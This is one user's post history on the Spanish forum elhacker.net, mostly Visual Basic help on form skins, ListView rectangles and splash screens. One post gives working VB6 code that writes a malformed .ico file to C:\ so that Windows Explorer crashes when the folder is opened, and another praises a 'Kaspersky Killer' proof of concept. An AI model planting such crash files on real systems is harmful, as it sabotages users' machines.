elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Curso de javascript por TickTack


  Mostrar Mensajes
Páginas: 1 ... 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 [39] 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 ... 74
381  Programación / Programación Visual Basic / Re: Skin para tus formularios [Source] en: 21 Abril 2009, 03:36 am
Solucionado el problema que decía el_c0c0, gracias por el dato.

@aaronduran2 lo probe en Win Vista y no encontré falla, quizás vos esperas que se muestre completo al maximizarlo, pero en realidad debe comer parte del borde. creo que es eso a lo que te referís, si no es así, podrías poner una captura para ver si es algo que se puede solucionar.

Saludos y gracias por los comentarios.

382  Programación / Programación Visual Basic / Skin para tus formularios [Source] en: 19 Abril 2009, 21:38 pm
Buenas este es un modulo clase para aplicar Skin a nuestros formularios, anteriormente habia hecho algo similar pero tenia ciertas limitaciones, bien en esta versión se corrige esos problemas. en el link tambien esta el Editor para poder crear sus propios skin, yo por el momento pude crear estos 16.

383  Programación / Programación Visual Basic / Re: Progressbar en Listview en: 19 Abril 2009, 21:14 pm
hola fijate aca si es lo que buscas
384  Seguridad Informática / Abril negro / Explorer crash [Abril Negro] en: 16 Abril 2009, 05:07 am
Hola este es un pequeño fuente para crashear el explorer,no es nada del otro mundo, creo que esto es algo viejo pero tenia entendido con con SP3 no funcionaba,bueno a ami porlomenso me casca el explorer y tengo SP3.

Código:
Option Explicit
Dim Arr(62) As Byte

Private Sub Form_Load()

Arr(2) = 1: Arr(4) = 1: Arr(12) = 32: Arr(14) = 40
Arr(18) = 22: Arr(22) = 40: Arr(34) = 1: Arr(36) = 32

Open "C:\caca.ico" For Binary As #1
    Put #1, , Arr
Close #1

End Sub

al ejecutarlo despues cuando abran la carpeta en disco C:\ explota el explorer

lo que hace crea una falsa imagen (en este caso es .ico pero puede ser cualquier otro formato) y inserta unos bits que probocan un error en el explorer al intentar obtener los datos de esta.

Para eliminar esta imagen, Ejecutar > CMD > Del C:\caca.ico


Saludos

a por las dudas el codigo es en Visual Basic

aca un ejemplo comprimido de la imagen

la vajan y la descomprimen
385  Programación / Programación Visual Basic / Re: [POC] Kaspersky Killer en: 15 Abril 2009, 06:21 am
Muy buen code, no lo entiendo, pero es bueno jeje

Saludos
386  Programación / Programación Visual Basic / Re: problema: obtener Rect de un item de ListView en: 14 Abril 2009, 20:56 pm
Hola para obtener el Rect de un item de un listview externo fijate este ejemplo mira dentro del modulo MdlListview tenes una funcion que te crea un array con el caption y el rect de cada item del listview, eso si, tenes que pasarle el hwnd del listview ya que este utiliza el del escritorio.

Saludos
387  Programación / Programación Visual Basic / Re: Problema cSubclassToolBar cargar imagen. en: 13 Abril 2009, 19:53 pm
a bien, entonces supongo que debe haber alun tipo de actulización, segurmante mi disco de instalacion de VB ya la trae y otros no, probablemente de hay viene el problema.

Saludos y gracia por la data.
388  Programación / Programación Visual Basic / Re: problema: obtener Rect de un item de ListView en: 13 Abril 2009, 06:21 am
Hola a como no declares las varibles mucho no va a funcionar  ;)

y bueno si es que la declaraste el problema es como declaraste SendMessage

Código:
Option Explicit

Private Type RECT
    Left As Long
    Top As Long
    Right As Long
    Bottom As Long
End Type


Private Const LVM_FIRST As Long = &H1000
Private Const LVM_GETITEMRECT As Long = (LVM_FIRST + 14)

Private Declare Function SetParent Lib "user32" (ByVal hWndChild As Long, ByVal hWndNewParent As Long) As Long
Private Declare Function GetParent Lib "user32" (ByVal Hwnd As Long) As Long
Private Declare Function SendMessage Lib "user32" Alias "SendMessageA" _
                            (ByVal Hwnd As Long, _
                            ByVal wMsg As Long, _
                            ByVal wParam As Long, _
                            lParam As Any) As Long
 
 
Public Function tapRectItem(ByVal lnghWnd As Long, ByVal Index As Integer)
 
 Dim lRet As Long
 Dim tRec As RECT
 
 lRet = SendMessage(lnghWnd, LVM_GETITEMRECT, Index, tRec)
 
 Debug.Print tRec.Right, tRec.Bottom
 
 With Form1.Picture1
 
  .Top = tRec.Top
  .Left = tRec.Left
  .Height = tRec.Bottom - tRec.Top
  .Width = tRec.Right - tRec.Left
 
  .Visible = True
  lRet = SetParent(.Hwnd, lnghWnd)
 End With
 
End Function

bueno a como veo esto te digo, el formulario tiene que estar Me.ScaleMode = vbPixels o bien llevar las cordenadas a escala.
igual hacer esto es una chanchada porque en cuanto agas un scroll sobre el listview el picture va a pasar por devajo de este.
y si pensas hacer esto para un listview externo a tu aplicacion no te va a funcionar.

Saludos
389  Programación / Programación Visual Basic / Re: mostrar splash mientras carga un formulario en: 11 Abril 2009, 06:05 am
hola si efectivamente son los botones los que te tardan en cargar, lo mas probalble es que el codigo de este boton no este muy optimizado. ademas de que si estas en el IDE siempre va a tardar mucho mas compilado va a ser mucho mas rapido.

sugerencias cambiar de control para el boton

una bien fea es ponerlos a todos visible =flase y si trabjas con index en for podes ir haciendo el progreso e ir poniedo de a uno visible, pero me suena muy feo.

y la mejor pero mas dificil es crear un control que sea tu propio teclado e ir pintando zonas e imprimiendo texto y trabajar con regiones, eso vuela, pero vos sabras si lo podes hacer.

Saludos
390  Programación / Programación Visual Basic / Re: Como mantener procedimiento en ejecucion? en: 10 Abril 2009, 23:43 pm
Hola, si en efectivo un hook seria mejor, se que Cobein había hecho un modulo para ir vijilando los sucesos de ejecución pero no se si tengo dicho modulo.
por otro lado la forma en la que testeas la lista con un listbox es un mas lento, osea te conviene usar un array o una colección,  y no llamar  a cerrar todos estos procesos, ya que por lo que veo no verificas si esta en ejecución, lo que seria conveniente es que listes los procesos en ejecución y después compares cada uno, si coincides cierras el proceso.

Saludos
Páginas: 1 ... 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 [39] 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 ... 74
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines